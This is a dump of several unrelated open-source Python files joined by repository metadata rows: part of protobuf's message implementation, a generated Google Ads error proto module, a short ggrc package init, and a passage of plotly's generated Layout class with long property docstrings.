_AddMergeFromMethod(cls)
_AddWhichOneofMethod(message_descriptor, cls)
_AddReduceMethod(cls)
# Adds methods which do not depend on cls.
cls.Clear = _Clear
cls.DiscardUnknownFields = _DiscardUnknownFields
cls._SetListener = _SetListener
def _AddPrivateHelperMethods(message_descriptor, cls):
"""Adds implementation of private helper methods to cls."""
def Modified(self):
"""Sets the _cached_byte_size_dirty bit to true,
and propagates this to our listener iff this was a state change.
"""
# Note: Some callers check _cached_byte_size_dirty before calling
# _Modified() as an extra optimization. So, if this method is ever
# changed such that it does stuff even when _cached_byte_size_dirty is
# already true, the callers need to be updated.
if not self._cached_byte_size_dirty:
self._cached_byte_size_dirty = True
self._listener_for_children.dirty = True
self._is_present_in_parent = True
self._listener.Modified()
def _UpdateOneofState(self, field):
"""Sets field as the active field in its containing oneof.
Will also delete currently active field in the oneof, if it is different
from the argument. Does not mark the message as modified.
"""
other_field = self._oneofs.setdefault(field.containing_oneof, field)
if other_field is not field:
del self._fields[other_field]
self._oneofs[field.containing_oneof] = field
cls._Modified = Modified
cls.SetInParent = Modified
cls._UpdateOneofState = _UpdateOneofState
class _Listener(object):
"""MessageListener implementation that a parent message registers with its
child message.
In order to support semantics like:
foo.bar.baz.qux = 23
assert foo.HasField('bar')
...child objects must have back references to their parents.
This helper class is at the heart of this support.
"""
def __init__(self, parent_message):
"""Args:
parent_message: The message whose _Modified() method we should call when
we receive Modified() messages.
"""
# This listener establishes a back reference from a child (contained) object
# to its parent (containing) object. We make this a weak reference to avoid
# creating cyclic garbage when the client finishes with the 'parent' object
# in the tree.
if isinstance(parent_message, weakref.ProxyType):
self._parent_message_weakref = parent_message
else:
self._parent_message_weakref = weakref.proxy(parent_message)
# As an optimization, we also indicate directly on the listener whether
# or not the parent message is dirty. This way we can avoid traversing
# up the tree in the common case.
self.dirty = False
def Modified(self):
if self.dirty:
return
try:
# Propagate the signal to our parents iff this is the first field set.
self._parent_message_weakref._Modified()
except ReferenceError:
# We can get here if a client has kept a reference to a child object,
# and is now setting a field on it, but the child's parent has been
# garbage-collected. This is not an error.
pass
class _OneofListener(_Listener):
"""Special listener implementation for setting composite oneof fields."""
def __init__(self, parent_message, field):
"""Args:
parent_message: The message whose _Modified() method we should call when
we receive Modified() messages.
field: The descriptor of the field being set in the parent message.
"""
super(_OneofListener, self).__init__(parent_message)
self._field = field
def Modified(self):
"""Also updates the state of the containing oneof in the parent message."""
try:
self._parent_message_weakref._UpdateOneofState(self._field)
super(_OneofListener, self).Modified()
except ReferenceError:
pass
# TODO(robinson): Move elsewhere? This file is getting pretty ridiculous...
# TODO(robinson): Unify error handling of "unknown extension" crap.
# TODO(robinson): Support iteritems()-style iteration over all
# extensions with the "has" bits turned on?
class _ExtensionDict(object):
"""Dict-like container for supporting an indexable "Extensions"
field on proto instances.
Note that in all cases we expect extension handles to be
FieldDescriptors.
"""
def __init__(self, extended_message):
"""extended_message: Message instance for which we are the Extensions dict.
"""
self._extended_message = extended_message
def __getitem__(self, extension_handle):
"""Returns the current value of the given extension handle."""
_VerifyExtensionHandle(self._extended_message, extension_handle)
result = self._extended_message._fields.get(extension_handle)
if result is not None:
return result
if extension_handle.label == _FieldDescriptor.LABEL_REPEATED:
result = extension_handle._default_constructor(self._extended_message)
elif extension_handle.cpp_type == _FieldDescriptor.CPPTYPE_MESSAGE:
result = extension_handle.message_type._concrete_class()
try:
result._SetListener(self._extended_message._listener_for_children)
except ReferenceError:
pass
else:
# Singular scalar -- just return the default without inserting into the
# dict.
return extension_handle.default_value
# Atomically check if another thread has preempted us and, if not, swap
# in the new object we just created. If someone has preempted us, we
# take that object and discard ours.
# WARNING: We are relying on setdefault() being atomic. This is true
# in CPython but we haven't investigated others. This warning appears
# in several other locations in this file.
result = self._extended_message._fields.setdefault(
extension_handle, result)
return result
def __eq__(self, other):
if not isinstance(other, self.__class__):
return False
my_fields = self._extended_message.ListFields()
other_fields = other._extended_message.ListFields()
# Get rid of non-extension fields.
my_fields = [ field for field in my_fields if field.is_extension ]
other_fields = [ field for field in other_fields if field.is_extension ]
return my_fields == other_fields
def __ne__(self, other):
return not self == other
def __hash__(self):
raise TypeError('unhashable object')
# Note that this is only meaningful for non-repeated, scalar extension
# fields. Note also that we may have to call _Modified() when we do
# successfully set a field this way, to set any necssary "has" bits in the
# ancestors of the extended message.
def __setitem__(self, extension_handle, value):
"""If extension_handle specifies a non-repeated, scalar extension
field, sets the value of that field.
"""
_VerifyExtensionHandle(self._extended_message, extension_handle)
if (extension_handle.label == _FieldDescriptor.LABEL_REPEATED or
extension_handle.cpp_type == _FieldDescriptor.CPPTYPE_MESSAGE):
raise TypeError(
'Cannot assign to extension "%s" because it is a repeated or '
'composite type.' % extension_handle.full_name)
# It's slightly wasteful to lookup the type checker each time,
# but we expect this to be a vanishingly uncommon case anyway.
type_checker = type_checkers.GetTypeChecker(extension_handle)
# pylint: disable=protected-access
self._extended_message._fields[extension_handle] = (
type_checker.CheckValue(value))
self._extended_message._Modified()
def _FindExtensionByName(self, name):
"""Tries to find a known extension with the specified name.
Args:
name: Extension full name.
Returns:
Extension field descriptor.
"""
return self._extended_message._extensions_by_name.get(name, None)
def _FindExtensionByNumber(self, number):
"""Tries to find a known extension with the field number.
Args:
number: Extension field number.
Returns:
Extension field descriptor.
"""
return self._extended_message._extensions_by_number.get(number, None)
| 36.925926 | 80 | 0.719703 |
e36f30f59f3375e746e9dcaafc157e55197654f4 | 3,787 | py | Python | google/ads/google_ads/v5/proto/errors/null_error_pb2.py | arammaliachi/google-ads-python | a4fe89567bd43eb784410523a6306b5d1dd9ee67 | [
"Apache-2.0"
] | 1 | 2021-04-09T04:28:47.000Z | 2021-04-09T04:28:47.000Z | google/ads/google_ads/v5/proto/errors/null_error_pb2.py | arammaliachi/google-ads-python | a4fe89567bd43eb784410523a6306b5d1dd9ee67 | [
"Apache-2.0"
] | null | null | null | google/ads/google_ads/v5/proto/errors/null_error_pb2.py | arammaliachi/google-ads-python | a4fe89567bd43eb784410523a6306b5d1dd9ee67 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: google/ads/googleads_v5/proto/errors/null_error.proto
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from google.api import annotations_pb2 as google_dot_api_dot_annotations__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='google/ads/googleads_v5/proto/errors/null_error.proto',
package='google.ads.googleads.v5.errors',
syntax='proto3',
serialized_options=b'\n\"com.google.ads.googleads.v5.errorsB\016NullErrorProtoP\001ZDgoogle.golang.org/genproto/googleapis/ads/googleads/v5/errors;errors\242\002\003GAA\252\002\036Google.Ads.GoogleAds.V5.Errors\312\002\036Google\\Ads\\GoogleAds\\V5\\Errors\352\002\"Google::Ads::GoogleAds::V5::Errors',
create_key=_descriptor._internal_create_key,
serialized_pb=b'\n5google/ads/googleads_v5/proto/errors/null_error.proto\x12\x1egoogle.ads.googleads.v5.errors\x1a\x1cgoogle/api/annotations.proto\"L\n\rNullErrorEnum\";\n\tNullError\x12\x0f\n\x0bUNSPECIFIED\x10\x00\x12\x0b\n\x07UNKNOWN\x10\x01\x12\x10\n\x0cNULL_CONTENT\x10\x02\x42\xe9\x01\n\"com.google.ads.googleads.v5.errorsB\x0eNullErrorProtoP\x01ZDgoogle.golang.org/genproto/googleapis/ads/googleads/v5/errors;errors\xa2\x02\x03GAA\xaa\x02\x1eGoogle.Ads.GoogleAds.V5.Errors\xca\x02\x1eGoogle\\Ads\\GoogleAds\\V5\\Errors\xea\x02\"Google::Ads::GoogleAds::V5::Errorsb\x06proto3'
,
dependencies=[google_dot_api_dot_annotations__pb2.DESCRIPTOR,])
_NULLERRORENUM_NULLERROR = _descriptor.EnumDescriptor(
name='NullError',
full_name='google.ads.googleads.v5.errors.NullErrorEnum.NullError',
filename=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
values=[
_descriptor.EnumValueDescriptor(
name='UNSPECIFIED', index=0, number=0,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='UNKNOWN', index=1, number=1,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='NULL_CONTENT', index=2, number=2,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
],
containing_type=None,
serialized_options=None,
serialized_start=136,
serialized_end=195,
)
_sym_db.RegisterEnumDescriptor(_NULLERRORENUM_NULLERROR)
_NULLERRORENUM = _descriptor.Descriptor(
name='NullErrorEnum',
full_name='google.ads.googleads.v5.errors.NullErrorEnum',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
_NULLERRORENUM_NULLERROR,
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=119,
serialized_end=195,
)
_NULLERRORENUM_NULLERROR.containing_type = _NULLERRORENUM
DESCRIPTOR.message_types_by_name['NullErrorEnum'] = _NULLERRORENUM
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
NullErrorEnum = _reflection.GeneratedProtocolMessageType('NullErrorEnum', (_message.Message,), {
'DESCRIPTOR' : _NULLERRORENUM,
'__module__' : 'google.ads.googleads_v5.proto.errors.null_error_pb2'
,
'__doc__': """Container for enum describing possible null errors.""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v5.errors.NullErrorEnum)
})
_sym_db.RegisterMessage(NullErrorEnum)
DESCRIPTOR._options = None
# @@protoc_insertion_point(module_scope)
| 37.49505 | 583 | 0.784262 |
67ee8ee2ecad5411e464e1c3925a386a07aad4ee | 211 | py | Python | src/ggrc/__init__.py | HLD/ggrc-core | 9bdc0fc6ca9e252f4919db682d80e360d5581eb4 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | src/ggrc/__init__.py | HLD/ggrc-core | 9bdc0fc6ca9e252f4919db682d80e360d5581eb4 | [
"ECL-2.0",
"Apache-2.0"
] | 10 | 2018-07-06T00:04:23.000Z | 2021-02-26T21:13:20.000Z | src/ggrc/__init__.py | HLD/ggrc-core | 9bdc0fc6ca9e252f4919db682d80e360d5581eb4 | [
"ECL-2.0",
"Apache-2.0"
] | 1 | 2017-11-11T22:16:56.000Z | 2017-11-11T22:16:56.000Z | # Copyright (C) 2017 Google Inc.
# Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file>
"""Main GGRC module"""
from ggrc import bootstrap
db = bootstrap.get_db()
__all__ = [
db
]
| 16.230769 | 78 | 0.691943 |
44d22c1abc256e8faef7f13f72edf84e91331703 | 188,614 | py | Python | plotly/graph_objs/_layout.py | gnestor/plotly.py | a8ae062795ddbf9867b8578fe6d9e244948c15ff | [
"MIT"
] | 2 | 2018-12-03T15:20:42.000Z | 2018-12-03T15:20:47.000Z | plotly/graph_objs/_layout.py | gnestor/plotly.py | a8ae062795ddbf9867b8578fe6d9e244948c15ff | [
"MIT"
] | null | null | null | plotly/graph_objs/_layout.py | gnestor/plotly.py | a8ae062795ddbf9867b8578fe6d9e244948c15ff | [
"MIT"
] | 2 | 2019-06-17T01:35:57.000Z | 2020-11-03T01:07:19.000Z | from plotly.basedatatypes import BaseLayoutType
import copy
class Layout(BaseLayoutType):
# angularaxis
# -----------
@property
def angularaxis(self):
"""
The 'angularaxis' property is an instance of AngularAxis
that may be specified as:
- An instance of plotly.graph_objs.layout.AngularAxis
- A dict of string/value properties that will be passed
to the AngularAxis constructor
Supported dict properties:
domain
Polar chart subplots are not supported yet.
This key has currently no effect.
endpadding
Legacy polar charts are deprecated! Please
switch to "polar" subplots.
range
Legacy polar charts are deprecated! Please
switch to "polar" subplots. Defines the start
and end point of this angular axis.
showline
Legacy polar charts are deprecated! Please
switch to "polar" subplots. Determines whether
or not the line bounding this angular axis will
be shown on the figure.
showticklabels
Legacy polar charts are deprecated! Please
switch to "polar" subplots. Determines whether
or not the angular axis ticks will feature tick
labels.
tickcolor
Legacy polar charts are deprecated! Please
switch to "polar" subplots. Sets the color of
the tick lines on this angular axis.
ticklen
Legacy polar charts are deprecated! Please
switch to "polar" subplots. Sets the length of
the tick lines on this angular axis.
tickorientation
Legacy polar charts are deprecated! Please
switch to "polar" subplots. Sets the
orientation (from the paper perspective) of the
angular axis tick labels.
ticksuffix
Legacy polar charts are deprecated! Please
switch to "polar" subplots. Sets the length of
the tick lines on this angular axis.
visible
Legacy polar charts are deprecated! Please
switch to "polar" subplots. Determines whether
or not this axis will be visible.
Returns
-------
plotly.graph_objs.layout.AngularAxis
"""
return self['angularaxis']
@angularaxis.setter
def angularaxis(self, val):
self['angularaxis'] = val
# annotations
# -----------
@property
def annotations(self):
"""
The 'annotations' property is a tuple of instances of
Annotation that may be specified as:
- A list or tuple of instances of plotly.graph_objs.layout.Annotation
- A list or tuple of dicts of string/value properties that
will be passed to the Annotation constructor
Supported dict properties:
align
Sets the horizontal alignment of the `text`
within the box. Has an effect only if `text`
spans more two or more lines (i.e. `text`
contains one or more <br> HTML tags) or if an
explicit width is set to override the text
width.
arrowcolor
Sets the color of the annotation arrow.
arrowhead
Sets the end annotation arrow head style.
arrowside
Sets the annotation arrow head position.
arrowsize
Sets the size of the end annotation arrow head,
relative to `arrowwidth`. A value of 1
(default) gives a head about 3x as wide as the
line.
arrowwidth
Sets the width (in px) of annotation arrow
line.
ax
Sets the x component of the arrow tail about
the arrow head. If `axref` is `pixel`, a
positive (negative) component corresponds to
an arrow pointing from right to left (left to
right). If `axref` is an axis, this is an
absolute value on that axis, like `x`, NOT a
relative value.
axref
Indicates in what terms the tail of the
annotation (ax,ay) is specified. If `pixel`,
`ax` is a relative offset in pixels from `x`.
If set to an x axis id (e.g. "x" or "x2"), `ax`
is specified in the same terms as that axis.
This is useful for trendline annotations which
should continue to indicate the correct trend
when zoomed.
ay
Sets the y component of the arrow tail about
the arrow head. If `ayref` is `pixel`, a
positive (negative) component corresponds to
an arrow pointing from bottom to top (top to
bottom). If `ayref` is an axis, this is an
absolute value on that axis, like `y`, NOT a
relative value.
ayref
Indicates in what terms the tail of the
annotation (ax,ay) is specified. If `pixel`,
`ay` is a relative offset in pixels from `y`.
If set to a y axis id (e.g. "y" or "y2"), `ay`
is specified in the same terms as that axis.
This is useful for trendline annotations which
should continue to indicate the correct trend
when zoomed.
bgcolor
Sets the background color of the annotation.
bordercolor
Sets the color of the border enclosing the
annotation `text`.
borderpad
Sets the padding (in px) between the `text` and
the enclosing border.
borderwidth
Sets the width (in px) of the border enclosing
the annotation `text`.
captureevents
Determines whether the annotation text box
captures mouse move and click events, or allows
those events to pass through to data points in
the plot that may be behind the annotation. By
default `captureevents` is False unless
`hovertext` is provided. If you use the event
`plotly_clickannotation` without `hovertext`
you must explicitly enable `captureevents`.
clicktoshow
Makes this annotation respond to clicks on the
plot. If you click a data point that exactly
matches the `x` and `y` values of this
annotation, and it is hidden (visible: false),
it will appear. In "onoff" mode, you must click
the same point again to make it disappear, so
if you click multiple points, you can show
multiple annotations. In "onout" mode, a click
anywhere else in the plot (on another data
point or not) will hide this annotation. If you
need to show/hide this annotation in response
to different `x` or `y` values, you can set
`xclick` and/or `yclick`. This is useful for
example to label the side of a bar. To label
markers though, `standoff` is preferred over
`xclick` and `yclick`.
font
Sets the annotation text font.
height
Sets an explicit height for the text box. null
(default) lets the text set the box height.
Taller text will be clipped.
hoverlabel
plotly.graph_objs.layout.annotation.Hoverlabel
instance or dict with compatible properties
hovertext
Sets text to appear when hovering over this
annotation. If omitted or blank, no hover label
will appear.
name
When used in a template, named items are
created in the output figure in addition to any
items the figure already has in this array. You
can modify these items in the output figure by
making your own item with `templateitemname`
matching this `name` alongside your
modifications (including `visible: false` or
`enabled: false` to hide it). Has no effect
outside of a template.
opacity
Sets the opacity of the annotation (text +
arrow).
showarrow
Determines whether or not the annotation is
drawn with an arrow. If True, `text` is placed
near the arrow's tail. If False, `text` lines
up with the `x` and `y` provided.
standoff
Sets a distance, in pixels, to move the end
arrowhead away from the position it is pointing
at, for example to point at the edge of a
marker independent of zoom. Note that this
shortens the arrow from the `ax` / `ay` vector,
in contrast to `xshift` / `yshift` which moves
everything by this amount.
startarrowhead
Sets the start annotation arrow head style.
startarrowsize
Sets the size of the start annotation arrow
head, relative to `arrowwidth`. A value of 1
(default) gives a head about 3x as wide as the
line.
startstandoff
Sets a distance, in pixels, to move the start
arrowhead away from the position it is pointing
at, for example to point at the edge of a
marker independent of zoom. Note that this
shortens the arrow from the `ax` / `ay` vector,
in contrast to `xshift` / `yshift` which moves
everything by this amount.
templateitemname
Used to refer to a named item in this array in
the template. Named items from the template
will be created even without a matching item in
the input figure, but you can modify one by
making an item with `templateitemname` matching
its `name`, alongside your modifications
(including `visible: false` or `enabled: false`
to hide it). If there is no template or no
matching item, this item will be hidden unless
you explicitly show it with `visible: true`.
text
Sets the text associated with this annotation.
Plotly uses a subset of HTML tags to do things
like newline (<br>), bold (<b></b>), italics
(<i></i>), hyperlinks (<a href='...'></a>).
Tags <em>, <sup>, <sub> <span> are also
supported.
textangle
Sets the angle at which the `text` is drawn
with respect to the horizontal.
valign
Sets the vertical alignment of the `text`
within the box. Has an effect only if an
explicit height is set to override the text
height.
visible
Determines whether or not this annotation is
visible.
width
Sets an explicit width for the text box. null
(default) lets the text set the box width.
Wider text will be clipped. There is no
automatic wrapping; use <br> to start a new
line.
x
Sets the annotation's x position. If the axis
`type` is "log", then you must take the log of
your desired range. If the axis `type` is
"date", it should be date strings, like date
data, though Date objects and unix milliseconds
will be accepted and converted to strings. If
the axis `type` is "category", it should be
numbers, using the scale where each category is
assigned a serial number from zero in the order
it appears.
xanchor
Sets the text box's horizontal position anchor
This anchor binds the `x` position to the
"left", "center" or "right" of the annotation.
For example, if `x` is set to 1, `xref` to
"paper" and `xanchor` to "right" then the
right-most portion of the annotation lines up
with the right-most edge of the plotting area.
If "auto", the anchor is equivalent to "center"
for data-referenced annotations or if there is
an arrow, whereas for paper-referenced with no
arrow, the anchor picked corresponds to the
closest side.
xclick
Toggle this annotation when clicking a data
point whose `x` value is `xclick` rather than
the annotation's `x` value.
xref
Sets the annotation's x coordinate axis. If set
to an x axis id (e.g. "x" or "x2"), the `x`
position refers to an x coordinate If set to
"paper", the `x` position refers to the
distance from the left side of the plotting
area in normalized coordinates where 0 (1)
corresponds to the left (right) side.
xshift
Shifts the position of the whole annotation and
arrow to the right (positive) or left
(negative) by this many pixels.
y
Sets the annotation's y position. If the axis
`type` is "log", then you must take the log of
your desired range. If the axis `type` is
"date", it should be date strings, like date
data, though Date objects and unix milliseconds
will be accepted and converted to strings. If
the axis `type` is "category", it should be
numbers, using the scale where each category is
assigned a serial number from zero in the order
it appears.
yanchor
Sets the text box's vertical position anchor
This anchor binds the `y` position to the
"top", "middle" or "bottom" of the annotation.
For example, if `y` is set to 1, `yref` to
"paper" and `yanchor` to "top" then the top-
most portion of the annotation lines up with
the top-most edge of the plotting area. If
"auto", the anchor is equivalent to "middle"
for data-referenced annotations or if there is
an arrow, whereas for paper-referenced with no
arrow, the anchor picked corresponds to the
closest side.
yclick
Toggle this annotation when clicking a data
point whose `y` value is `yclick` rather than
the annotation's `y` value.
yref
Sets the annotation's y coordinate axis. If set
to an y axis id (e.g. "y" or "y2"), the `y`
position refers to an y coordinate If set to
"paper", the `y` position refers to the
distance from the bottom of the plotting area
in normalized coordinates where 0 (1)
corresponds to the bottom (top).
yshift
Shifts the position of the whole annotation and
arrow up (positive) or down (negative) by this
many pixels.
Returns
-------
tuple[plotly.graph_objs.layout.Annotation]
"""
return self['annotations']
@annotations.setter
def annotations(self, val):
self['annotations'] = val
# annotationdefaults
# ------------------
@property
def annotationdefaults(self):
"""
When used in a template (as
layout.template.layout.annotationdefaults), sets the default
property values to use for elements of layout.annotations
The 'annotationdefaults' property is an instance of Annotation
that may be specified as:
- An instance of plotly.graph_objs.layout.Annotation
- A dict of string/value properties that will be passed
to the Annotation constructor
Supported dict properties:
Returns
-------
plotly.graph_objs.layout.Annotation
"""
return self['annotationdefaults']
@annotationdefaults.setter
def annotationdefaults(self, val):
self['annotationdefaults'] = val
# autosize
# --------
@property
def autosize(self):
"""
Determines whether or not a layout width or height that has
been left undefined by the user is initialized on each
relayout. Note that, regardless of this attribute, an undefined
layout width or height is always initialized on the first call
to plot.
The 'autosize' property must be specified as a bool
(either True, or False)
Returns
-------
bool
"""
return self['autosize']
@autosize.setter
def autosize(self, val):
self['autosize'] = val
# bargap
# ------
@property
def bargap(self):
"""
Sets the gap (in plot fraction) between bars of adjacent
location coordinates.
The 'bargap' property is a number and may be specified as:
- An int or float in the interval [0, 1]
Returns
-------
int|float
"""
return self['bargap']
@bargap.setter
def bargap(self, val):
self['bargap'] = val
# bargroupgap
# -----------
@property
def bargroupgap(self):
"""
Sets the gap (in plot fraction) between bars of the same
location coordinate.
The 'bargroupgap' property is a number and may be specified as:
- An int or float in the interval [0, 1]
Returns
-------
int|float
"""
return self['bargroupgap']
@bargroupgap.setter
def bargroupgap(self, val):
self['bargroupgap'] = val
# barmode
# -------
@property
def barmode(self):
"""
Determines how bars at the same location coordinate are
displayed on the graph. With "stack", the bars are stacked on
top of one another With "relative", the bars are stacked on top
of one another, with negative values below the axis, positive
values above With "group", the bars are plotted next to one
another centered around the shared location. With "overlay",
the bars are plotted over one another, you might need to an
"opacity" to see multiple bars.
The 'barmode' property is an enumeration that may be specified as:
- One of the following enumeration values:
['stack', 'group', 'overlay', 'relative']
Returns
-------
Any
"""
return self['barmode']
@barmode.setter
def barmode(self, val):
self['barmode'] = val
# barnorm
# -------
@property
def barnorm(self):
"""
Sets the normalization for bar traces on the graph. With
"fraction", the value of each bar is divided by the sum of all
values at that location coordinate. "percent" is the same but
multiplied by 100 to show percentages.
The 'barnorm' property is an enumeration that may be specified as:
- One of the following enumeration values:
['', 'fraction', 'percent']
Returns
-------
Any
"""
return self['barnorm']
@barnorm.setter
def barnorm(self, val):
self['barnorm'] = val
# boxgap
# ------
@property
def boxgap(self):
"""
Sets the gap (in plot fraction) between boxes of adjacent
location coordinates.
The 'boxgap' property is a number and may be specified as:
- An int or float in the interval [0, 1]
Returns
-------
int|float
"""
return self['boxgap']
@boxgap.setter
def boxgap(self, val):
self['boxgap'] = val
# boxgroupgap
# -----------
@property
def boxgroupgap(self):
"""
Sets the gap (in plot fraction) between boxes of the same
location coordinate.
The 'boxgroupgap' property is a number and may be specified as:
- An int or float in the interval [0, 1]
Returns
-------
int|float
"""
return self['boxgroupgap']
@boxgroupgap.setter
def boxgroupgap(self, val):
self['boxgroupgap'] = val
# boxmode
# -------
@property
def boxmode(self):
"""
Determines how boxes at the same location coordinate are
displayed on the graph. If "group", the boxes are plotted next
to one another centered around the shared location. If
"overlay", the boxes are plotted over one another, you might
need to set "opacity" to see them multiple boxes.
The 'boxmode' property is an enumeration that may be specified as:
- One of the following enumeration values:
['group', 'overlay']
Returns
-------
Any
"""
return self['boxmode']
@boxmode.setter
def boxmode(self, val):
self['boxmode'] = val
# calendar
# --------
@property
def calendar(self):
"""
Sets the default calendar system to use for interpreting and
displaying dates throughout the plot.
The 'calendar' property is an enumeration that may be specified as:
- One of the following enumeration values:
['gregorian', 'chinese', 'coptic', 'discworld',
'ethiopian', 'hebrew', 'islamic', 'julian', 'mayan',
'nanakshahi', 'nepali', 'persian', 'jalali', 'taiwan',
'thai', 'ummalqura']
Returns
-------
Any
"""
return self['calendar']
@calendar.setter
def calendar(self, val):
self['calendar'] = val
# clickmode
# ---------
@property
def clickmode(self):
"""
Determines the mode of single click interactions. "event" is
the default value and emits the `plotly_click` event. In
addition this mode emits the `plotly_selected` event in drag
modes "lasso" and "select", but with no event data attached
(kept for compatibility reasons). The "select" flag enables
selecting single data points via click. This mode also supports
persistent selections, meaning that pressing Shift while
clicking, adds to / subtracts from an existing selection.
"select" with `hovermode`: "x" can be confusing, consider
explicitly setting `hovermode`: "closest" when using this
feature. Selection events are sent accordingly as long as
"event" flag is set as well. When the "event" flag is missing,
`plotly_click` and `plotly_selected` events are not fired.
The 'clickmode' property is a flaglist and may be specified
as a string containing:
- Any combination of ['event', 'select'] joined with '+' characters
(e.g. 'event+select')
OR exactly one of ['none'] (e.g. 'none')
Returns
-------
Any
"""
return self['clickmode']
@clickmode.setter
def clickmode(self, val):
self['clickmode'] = val
# colorway
# --------
@property
def colorway(self):
"""
Sets the default trace colors.
The 'colorway' property is a colorlist that may be specified
as a tuple, list, one-dimensional numpy array, or pandas Series of valid
color strings
Returns
-------
list
"""
return self['colorway']
@colorway.setter
def colorway(self, val):
self['colorway'] = val
# datarevision
# ------------
@property
def datarevision(self):
"""
If provided, a changed value tells `Plotly.react` that one or
more data arrays has changed. This way you can modify arrays
in-place rather than making a complete new copy for an
incremental change. If NOT provided, `Plotly.react` assumes
that data arrays are being treated as immutable, thus any data
array with a different identity from its predecessor contains
new data.
The 'datarevision' property accepts values of any type
Returns
-------
Any
"""
return self['datarevision']
@datarevision.setter
def datarevision(self, val):
self['datarevision'] = val
# direction
# ---------
@property
def direction(self):
"""
Legacy polar charts are deprecated! Please switch to "polar"
subplots. Sets the direction corresponding to positive angles
in legacy polar charts.
The 'direction' property is an enumeration that may be specified as:
- One of the following enumeration values:
['clockwise', 'counterclockwise']
Returns
-------
Any
"""
return self['direction']
@direction.setter
def direction(self, val):
self['direction'] = val
# dragmode
# --------
@property
def dragmode(self):
"""
Determines the mode of drag interactions. "select" and "lasso"
apply only to scatter traces with markers or text. "orbit" and
"turntable" apply only to 3D scenes.
The 'dragmode' property is an enumeration that may be specified as:
- One of the following enumeration values:
['zoom', 'pan', 'select', 'lasso', 'orbit', 'turntable']
Returns
-------
Any
"""
return self['dragmode']
@dragmode.setter
def dragmode(self, val):
self['dragmode'] = val
# extendpiecolors
# ---------------
@property
def extendpiecolors(self):
"""
If `true`, the pie slice colors (whether given by `piecolorway`
or inherited from `colorway`) will be extended to three times
its original length by first repeating every color 20% lighter
then each color 20% darker. This is intended to reduce the
likelihood of reusing the same color when you have many slices,
but you can set `false` to disable. Colors provided in the
trace, using `marker.colors`, are never extended.
The 'extendpiecolors' property must be specified as a bool
(either True, or False)
Returns
-------
bool
"""
return self['extendpiecolors']
@extendpiecolors.setter
def extendpiecolors(self, val):
self['extendpiecolors'] = val
# font
# ----
@property
def font(self):
"""
Sets the global font. Note that fonts used in traces and other
layout components inherit from the global font.
The 'font' property is an instance of Font
that may be specified as:
- An instance of plotly.graph_objs.layout.Font
- A dict of string/value properties that will be passed
to the Font constructor
Supported dict properties:
color
family
HTML font family - the typeface that will be
applied by the web browser. The web browser
will only be able to apply a font if it is
available on the system which it operates.
Provide multiple font families, separated by
commas, to indicate the preference in which to
apply fonts if they aren't available on the
system. The plotly service (at https://plot.ly
or on-premise) generates images on a server,
where only a select number of fonts are
installed and supported. These include "Arial",
"Balto", "Courier New", "Droid Sans",, "Droid
Serif", "Droid Sans Mono", "Gravitas One", "Old
Standard TT", "Open Sans", "Overpass", "PT Sans
Narrow", "Raleway", "Times New Roman".
size
Returns
-------
plotly.graph_objs.layout.Font
"""
return self['font']
@font.setter
def font(self, val):
self['font'] = val
# geo
# ---
@property
def geo(self):
"""
The 'geo' property is an instance of Geo
that may be specified as:
- An instance of plotly.graph_objs.layout.Geo
- A dict of string/value properties that will be passed
to the Geo constructor
Supported dict properties:
bgcolor
Set the background color of the map
center
plotly.graph_objs.layout.geo.Center instance or
dict with compatible properties
coastlinecolor
Sets the coastline color.
coastlinewidth
Sets the coastline stroke width (in px).
countrycolor
Sets line color of the country boundaries.
countrywidth
Sets line width (in px) of the country
boundaries.
domain
plotly.graph_objs.layout.geo.Domain instance or
dict with compatible properties
framecolor
Sets the color the frame.
framewidth
Sets the stroke width (in px) of the frame.
lakecolor
Sets the color of the lakes.
landcolor
Sets the land mass color.
lataxis
plotly.graph_objs.layout.geo.Lataxis instance
or dict with compatible properties
lonaxis
plotly.graph_objs.layout.geo.Lonaxis instance
or dict with compatible properties
oceancolor
Sets the ocean color
projection
plotly.graph_objs.layout.geo.Projection
instance or dict with compatible properties
resolution
Sets the resolution of the base layers. The
values have units of km/mm e.g. 110 corresponds
to a scale ratio of 1:110,000,000.
rivercolor
Sets color of the rivers.
riverwidth
Sets the stroke width (in px) of the rivers.
scope
Set the scope of the map.
showcoastlines
Sets whether or not the coastlines are drawn.
showcountries
Sets whether or not country boundaries are
drawn.
showframe
Sets whether or not a frame is drawn around the
map.
showlakes
Sets whether or not lakes are drawn.
showland
Sets whether or not land masses are filled in
color.
showocean
Sets whether or not oceans are filled in color.
showrivers
Sets whether or not rivers are drawn.
showsubunits
Sets whether or not boundaries of subunits
within countries (e.g. states, provinces) are
drawn.
subunitcolor
Sets the color of the subunits boundaries.
subunitwidth
Sets the stroke width (in px) of the subunits
boundaries.
Returns
-------
plotly.graph_objs.layout.Geo
"""
return self['geo']
@geo.setter
def geo(self, val):
self['geo'] = val
# grid
# ----
@property
def grid(self):
"""
The 'grid' property is an instance of Grid
that may be specified as:
- An instance of plotly.graph_objs.layout.Grid
- A dict of string/value properties that will be passed
to the Grid constructor
Supported dict properties:
columns
The number of columns in the grid. If you
provide a 2D `subplots` array, the length of
its longest row is used as the default. If you
give an `xaxes` array, its length is used as
the default. But it's also possible to have a
different length, if you want to leave a row at
the end for non-cartesian subplots.
domain
plotly.graph_objs.layout.grid.Domain instance
or dict with compatible properties
pattern
If no `subplots`, `xaxes`, or `yaxes` are given
but we do have `rows` and `columns`, we can
